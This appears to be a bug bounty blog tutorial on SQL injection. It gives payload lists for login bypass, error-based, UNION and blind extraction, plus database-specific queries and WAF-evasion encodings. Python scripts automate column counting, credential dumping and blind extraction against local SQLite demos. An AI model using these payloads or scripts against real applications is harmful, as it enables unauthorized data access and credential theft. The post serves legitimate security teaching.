SQL Injection (SQLi) remains one of the most impactful web vulnerabilities — despite being known for over two decades. As a bug bounty hunter, mastering SQLi techniques can earn you serious recognition, bounties, and credibility. But responsible hacking always starts with permission. In this post, we’ll explore practical SQLi payloads you can use only on authorized targets, like those listed on platforms such as HackerOne, Bugcrowd, Synack, and YesWeHack.
Legal Disclaimer
This blog is for educational purposes only. Do not use these techniques on systems you do not have explicit permission to test. Always respect the rules of engagement (RoE) in your bug bounty program.
What is SQL Injection?
SQL Injection occurs when untrusted input is concatenated into a database query in a way that changes the query's structure, so the attacker's text is executed as SQL instead of being compared as data. This can lead to unauthorized data access, bypassing authentication, or even full system compromise where the database can write files or run OS commands.
Where to Look for SQLi?
SQLi opportunities can be found in:
- Login forms
- Search bars
- Product filters
- URL parameters
- HTTP headers (e.g., User-Agent, Referer)
- Cookies and hidden fields
Basic SQLi Payloads
These payloads test for simple injection points.

```sql
' OR '1'='1
' OR 1=1 --
admin' --
' OR '1'='1' --
```

Use these on login forms to attempt bypasses. If the app builds the query by string concatenation, `admin' --` in the username field turns `... WHERE username = 'admin' --' AND password = '...'` into a query whose password check is commented out, and `' OR '1'='1` in the password field makes the whole WHERE clause true, which typically logs you in as the first user in the table. Where the payload lands matters: `' OR '1'='1` in the username field alone usually fails, because AND binds tighter than OR and the password comparison still has to hold. Note that MySQL only treats `--` as a comment when it is followed by whitespace, so keep the trailing space (a common convention is `-- -`); `#` also works there.
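The login bypass described above, as an added example that is not part of the original post: a vulnerable string-built login query beside its parameterized fix, run against an in-memory SQLite database with a constructed users table so it works offline. The table, column and function names are assumptions; the behaviour of `--` and `OR` is the same on MySQL and PostgreSQL.

```python
"""Login bypass against a string-built query, beside the parameterized fix.

Added example, not code from the original post. A throwaway in-memory SQLite
database with a constructed users table stands in for the target's backend;
table, column and function names are assumptions.
"""
import sqlite3


def make_db():
    """Constructed sample data: the admin row comes first, as is common in real apps."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
                 "password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("admin", "s3cret-admin-pw", "admin"), ("alice", "alice-pw", "user")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """String concatenation: user input becomes part of the SQL grammar."""
    sql = ("SELECT username, role FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    try:
        return conn.execute(sql).fetchone()   # (username, role) or None
    except sqlite3.Error:
        return None                            # the app would show an error page


def login_safe(conn, username, password):
    """Parameterized query: values travel separately and cannot change the query shape."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()


if __name__ == "__main__":
    db = make_db()
    # admin' -- comments out the password check entirely
    print(login_vulnerable(db, "admin' --", "wrong"))      # ('admin', 'admin')
    # ' OR '1'='1 in the PASSWORD field makes the whole WHERE true: first row wins
    print(login_vulnerable(db, "nobody", "' OR '1'='1"))   # ('admin', 'admin')
    # the same payload in the USERNAME field fails: AND binds tighter than OR
    print(login_vulnerable(db, "' OR '1'='1", "wrong"))    # None
    # the parameterized version treats the payload as a literal username
    print(login_safe(db, "admin' --", "wrong"))            # None
```

The third call is the one worth remembering: the same payload succeeds or fails depending on which side of the AND it lands on, which is why the page's advice to understand how the query is structured matters even for the simplest bypass.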
Error-Based SQLi
Use these when the server returns SQL-related error messages.

```sql
' AND 1=CAST((SELECT current_user) AS INT)--
' AND (SELECT COUNT(*) FROM users) > 0--
```

The first payload is a PostgreSQL trick: `current_user` is a keyword there (not a function), and casting its text value to an integer fails with a message that quotes the value, e.g. `invalid input syntax for type integer: "postgres"`. MySQL does not raise on a failed numeric cast (it warns and returns 0), so error-based extraction there usually goes through XML functions such as `extractvalue(1, concat(0x7e, version()))`, whose error message echoes the concatenated value. The second payload errors only when the `users` table does not exist, which makes it a quick way to confirm table names.
Look for verbose error messages like:
You have an error in your SQL syntax...
UNION-Based SQLi
This technique appends a second SELECT to the original query with `UNION SELECT`, so its rows are rendered wherever the application shows the original results.

```sql
' UNION SELECT null, user() --
' UNION SELECT null, database(), version() --
```

The injected SELECT must return the same number of columns as the original query (the two payloads above assume two and three columns respectively), and on strict databases such as PostgreSQL, Oracle and SQL Server the column types must be compatible too, so pad with `NULL` and place strings only where the original column is text. Use `ORDER BY` to find the number of columns: increase the number until the query errors; the last value that worked is the column count.

```sql
' ORDER BY 1--
' ORDER BY 2--
```
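The column-counting and extraction chain above, automated as an added example that is not part of the original post. An in-memory SQLite database with constructed products and users tables stands in for the target, and `search()` plays the vulnerable endpoint; all names are assumptions. Against MySQL or PostgreSQL the same payloads are built with that database's version function and schema tables (`information_schema.tables`) in place of `sqlite_version()` and `sqlite_master`.

```python
"""Counting columns with ORDER BY, then dumping data with UNION SELECT.

Added example, not code from the original post. An in-memory SQLite database
with constructed products/users tables stands in for the target; search()
is the vulnerable endpoint. Names are assumptions.
"""
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    conn.executemany("INSERT INTO products (name, price) VALUES (?, ?)",
                     [("Widget", 9.99), ("Gadget", 19.5)])
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 'hunter2')")
    return conn


def search(conn, term):
    """Vulnerable endpoint: `term` is concatenated into a two-column SELECT.

    Returns the rows the page would render, or None when the query errors
    (the app shows a generic error page, which is all the attacker sees).
    """
    sql = "SELECT name, price FROM products WHERE name LIKE '%" + term + "%'"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error:
        return None


def count_columns(endpoint, max_cols=20):
    """ORDER BY n succeeds while n <= column count and errors once past it."""
    for n in range(1, max_cols + 1):
        if endpoint(f"' ORDER BY {n}-- ") is None:
            return n - 1
    return None


def union_payload(ncols, exprs, from_clause=""):
    """Pad the injected SELECT with NULLs so it matches the original column count.

    The leading 'nomatch' term empties the original result set so that only
    the injected rows come back.
    """
    cols = exprs + ["NULL"] * (ncols - len(exprs))
    tail = f" {from_clause}" if from_clause else ""
    return "nomatch' UNION SELECT " + ", ".join(cols) + tail + "-- "


def dump(endpoint):
    """Full chain: column count, DB version, table names, then the users table."""
    ncols = count_columns(endpoint)
    version = endpoint(union_payload(ncols, ["sqlite_version()"]))[0][0]
    tables = sorted(r[0] for r in endpoint(
        union_payload(ncols, ["name"], "FROM sqlite_master WHERE type='table'")))
    creds = endpoint(union_payload(ncols, ["username", "password"], "FROM users"))
    return {"columns": ncols, "version": version, "tables": tables, "creds": creds}


if __name__ == "__main__":
    db = make_db()
    print(dump(lambda term: search(db, term)))
```

`count_columns` stops at the first error, which is exactly what you see from the outside: a page that renders for `ORDER BY 2` and breaks for `ORDER BY 3` means two columns, and every later payload pads to that width.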
Blind SQLi (Boolean-Based)
Ideal when the application behaves differently based on true/false conditions, even without visible errors.

```sql
' AND 1=1 --
' AND 1=2 --
' AND SUBSTRING(@@version,1,1)='5' --
```

Watch for changes in response length or content. If the `1=1` and `1=2` responses differ, you have a one-bit oracle: extracting data then means asking yes/no questions about one character at a time, as the third payload does (`@@version` is MySQL and SQL Server syntax).
Time-Based Blind SQLi
Detectable via delayed responses using `SLEEP()` (MySQL), `pg_sleep()` (PostgreSQL) or `WAITFOR DELAY` (SQL Server).

```sql
' OR IF(1=1, SLEEP(5), 0)--
'; WAITFOR DELAY '0:0:5'--   -- SQL Server; needs stacked queries
```

Useful when no output is returned but the response delay reveals logic processing. Two caveats: the `OR IF(...)` form is evaluated for every row the query examines, so on a large table a 5-second sleep can turn into minutes (prefer `AND` with a condition the row already satisfies, or put the sleep in a single-row subquery); and network jitter means a single slow response proves little, so repeat the request and compare it against a deliberately false condition.
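Both blind techniques above share the same extraction loop; only the oracle differs. The following is an added example, not code from the original post: a boolean oracle built from a vulnerable product lookup, a timing oracle built the same way, and a binary-search extractor that pulls a string one character at a time through either. It runs against an in-memory SQLite database with constructed tables; since SQLite has no `SLEEP()`, a Python `sleep` function is registered as a stand-in for MySQL's `SLEEP()` or PostgreSQL's `pg_sleep()`. Names, tables and the timing threshold are assumptions.

```python
"""Blind SQLi extraction with a boolean oracle, plus a timing oracle built the same way.

Added example, not code from the original post. An in-memory SQLite database
with constructed products/users tables stands in for the target; the
Python-registered sleep() stands in for SLEEP()/pg_sleep(), which SQLite
lacks. Names and thresholds are assumptions.
"""
import sqlite3
import time


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products (name) VALUES (?)", [("Widget",), ("Gadget",)])
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 'hunter2')")
    conn.create_function("sleep", 1, time.sleep)   # stand-in for SLEEP()/pg_sleep()
    return conn


def product_exists(conn, name):
    """Vulnerable endpoint: True when the string-built query finds a row."""
    sql = "SELECT name FROM products WHERE name = '" + name + "'"
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def boolean_oracle(conn):
    """Answer 'is this SQL condition true?' from page content alone."""
    return lambda cond: product_exists(conn, f"Widget' AND ({cond})-- ")


def time_oracle(conn, delay=0.1):
    """Same question, answered by response time: the query sleeps only when cond holds."""
    def ask(cond):
        t0 = time.monotonic()
        product_exists(conn, f"Widget' AND CASE WHEN ({cond}) THEN sleep({delay}) ELSE 0 END-- ")
        return time.monotonic() - t0 >= delay / 2
    return ask


def extract_string(oracle, expr, max_len=64):
    """Pull the value of SQL expression `expr` one character at a time.

    Each character is found by binary search over ASCII code points, 7 oracle
    calls per character instead of up to 95 for a linear scan. unicode() of an
    empty substr() is NULL, so the search settles on 0 past the end of the
    string. Widen the range for non-ASCII data.
    """
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(({expr}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    ask = boolean_oracle(db)
    print(extract_string(ask, "sqlite_version()"))
    print(extract_string(ask, "SELECT password FROM users WHERE username='admin'"))
    print(time_oracle(db)("1=1"), time_oracle(db)("1=2"))
```

Swapping `boolean_oracle` for `time_oracle` in the `extract_string` call is the whole difference between the two techniques; the timing version is far slower (one delay per true answer) and noisier, which is why `delay / 2` rather than `delay` is the threshold and why a real run should re-ask any answer that sits near it.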
Targeting Specific Databases
Once you know the column count, swap in the functions that identify the backend and the account you are running as. Each payload below assumes a two-column query except the Oracle one, which selects a single column; pad with `NULL` to match the count you found with `ORDER BY`. Oracle also requires a FROM clause in every SELECT (use `dual` when there is nothing to select from).
MySQL

```sql
' UNION SELECT user(), database() --
```

PostgreSQL

```sql
' UNION SELECT current_user, version() --
```

Microsoft SQL Server

```sql
' UNION SELECT system_user, @@version --
```

Oracle

```sql
' UNION SELECT banner FROM v$version --
```
Bypassing WAFs
Use encoding, case changes, or SQL comments:

```sql
%27%20OR%201=1--
' oR '1'='1
'/*!UNION*/ SELECT NULL,NULL--
%27UnIoN%20SeLeCt%20null,null--
```

WAFs may block obvious patterns, but these tricks can sneak past. Keep in mind what each one relies on: most WAFs URL-decode before matching, so a single layer of `%27` rarely helps unless the application decodes a second time; case changes only beat case-sensitive signatures; and `/*!UNION*/` is a MySQL version-conditional comment that MySQL executes while every other database treats it as an ordinary comment, so it doubles as a fingerprint.
Tools of the Trade
- sqlmap — Automated SQLi testing tool
- Burp Suite — Intruder for manual fuzzing, plus extensions such as SQLiPy (a sqlmap integration)
- NoSQLMap — For MongoDB and other NoSQL targets
- HackTricks SQLi Cheatsheet — Excellent reference
Pro Tips for Bounty Hunters
- Log all payloads: Always keep a record of what you tested and how.
- Try every input vector: Don't just test URLs — check headers and cookies too.
- Understand the app logic: Knowing how queries are structured helps tailor your payloads.
- Respect the scope: Always stay within allowed domains/endpoints.
Final Thoughts
SQL Injection is more than just a classic bug — it’s still a high-value target in bug bounty hunting. Understanding how and where to inject payloads can make the difference between a $0 report and a $5,000+ bounty.
Want to sharpen your skills? Try labs like:
- PortSwigger Web Security Academy
- Hack The Box
- TryHackMe
Happy hunting, and stay ethical!
Follow Me for More
Got a favorite payload or tool? Share it in the comments!
Subscribe for more bug bounty techniques and real-world examples.